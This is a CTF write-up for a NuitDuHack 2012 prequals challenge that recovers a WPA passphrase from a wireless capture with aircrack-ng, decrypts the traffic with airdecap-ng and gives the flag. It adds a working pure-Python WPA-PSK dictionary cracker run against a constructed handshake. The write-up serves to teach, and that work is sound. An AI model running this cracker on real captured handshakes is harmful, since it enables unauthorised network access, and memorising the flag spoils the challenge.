NuitDuHack 2012 Prequals – sciteekadm.cap

Hopefully, we succeeded in spying on some wireless communications around the Sciteek
building; our technical staff has attached the capture file. Will you be able
to exploit it? We hope that some valuable files were exchanged during the
Please entitle your reply “captured file”, as usual.

By the way, your account has been credited with $1000.

Summary: WPA traffic decryption

Here we have a pcap file with an 802.11 (wireless) traffic dump. The data frames are WPA-encrypted, but the capture contains a 4-way handshake, so let’s try aircrack-ng with a small wordlist (a captured handshake is all a WPA-PSK dictionary attack needs):

$ aircrack-ng sciteekadm.cap -w 500-worst-passwords.txt 
Opening sciteekadm.cap
Read 345 packets.
   #  BSSID              ESSID                     Encryption
   1  40:FC:89:E0:FF:D3  Sciteek-adm               WPA (1 handshake)
Choosing first network as target.
Opening sciteekadm.cap
Reading packets, please wait...
                                 Aircrack-ng 1.1
                   [00:00:00] 4 keys tested (300.98 k/s)
                           KEY FOUND! [ 12345678 ]
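What aircrack-ng just did for each of those 4 keys, as an added example (this is not code from the write-up or from aircrack-ng): for every wordlist entry, derive PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID), derive the PTK from the PMK plus the two MAC addresses and two nonces of the handshake, take the KCK (first 16 bytes of the PTK) and recompute the MIC of EAPOL-Key message 2; a match means the passphrase is right. The ESSID, BSSID and passphrase below are taken from the aircrack-ng output above; the client MAC, the nonces and the EAPOL-Key frame itself are constructed for the demo (the frame’s MIC is computed under the correct passphrase so the attack has something to verify), not taken from sciteekadm.cap.

```python
"""WPA/WPA2-PSK dictionary attack against a 4-way handshake, in pure Python.

Added example, not from the original write-up and not aircrack-ng code.
The handshake frame, client MAC and nonces are CONSTRUCTED; only the SSID,
BSSID and the passphrase "12345678" come from the aircrack-ng output.
"""
import hashlib
import hmac
from typing import Optional, Sequence

MIC_OFFSET = 81      # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the Key MIC
SNONCE_OFFSET = 17   # 4-byte EAPOL header + 13 bytes of fields before the Key Nonce


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why airdecap-ng also needs -e."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the handshake's MACs and nonces (sorted, as the standard requires)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its Key MIC field zeroed.
    The Key Descriptor Version (low 3 bits of Key Information, frame byte 6)
    selects HMAC-MD5 (version 1, WPA/TKIP) or HMAC-SHA1-128 (version 2, WPA2/CCMP)."""
    version = eapol[6] & 0x07
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
              eapol_msg2: bytes, wordlist: Sequence[str]) -> Optional[str]:
    """Return the first wordlist entry whose KCK reproduces the MIC of message 2, else None."""
    snonce = eapol_msg2[SNONCE_OFFSET:SNONCE_OFFSET + 32]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:      # WPA passphrases are 8..63 chars; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


def build_msg2(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
               snonce: bytes, passphrase: str) -> bytes:
    """Constructed EAPOL-Key message 2 (WPA2: Key Info 0x010a = Pairwise + MIC, version 2,
    empty Key Data) with a valid MIC under `passphrase`; stands in for the frame
    you would pull out of the pcap."""
    body = (bytes([2]) + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]


SSID = "Sciteek-adm"                               # from the aircrack-ng output
AP_MAC = bytes.fromhex("40fc89e0ffd3")             # BSSID from the aircrack-ng output
STA_MAC = bytes.fromhex("00115522aabb")            # constructed client address
ANONCE = hashlib.sha256(b"demo anonce").digest()   # constructed 32-byte nonces
SNONCE = hashlib.sha256(b"demo snonce").digest()
MSG2 = build_msg2(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, "12345678")
WORDLIST = ["password", "letmein", "12345678", "qwertyuiop"]   # constructed mini wordlist


def demo() -> Optional[str]:
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, MSG2, WORDLIST)


if __name__ == "__main__":
    print("KEY FOUND!", demo())
```

The 4096-round PBKDF2 per candidate is the whole cost of the attack, which is why aircrack-ng quotes a keys-per-second rate and why a short, common passphrase like this one falls to a 500-entry list in under a second.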

Password found! Sadly, Wireshark still can’t decrypt the traffic even with the passphrase configured, because the EAPOL handshake packets in this capture are corrupted/missing.
But there is a nice tool called airdecap-ng (thx to @kyprizel). It takes the passphrase and the ESSID; the ESSID is not optional, since it is the salt in the PMK derivation:

$ airdecap-ng -p 12345678 sciteekadm.cap -e Sciteek-adm
Total number of packets read           345
Total number of WEP data packets         0
Total number of WPA data packets        55
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets        41
$ wireshark sciteekadm-dec.cap

41 of the 55 WPA data packets were decrypted, which is enough. Now we can simply extract the transferred file from the TCP session (Follow TCP Stream in Wireshark and save the raw payload):

The flag: 7e4ef92d1472fa1a2d41b2d3c1d2b77a

1 comment

  1. Turns out the solution was quite elegant, if you know the right software :)
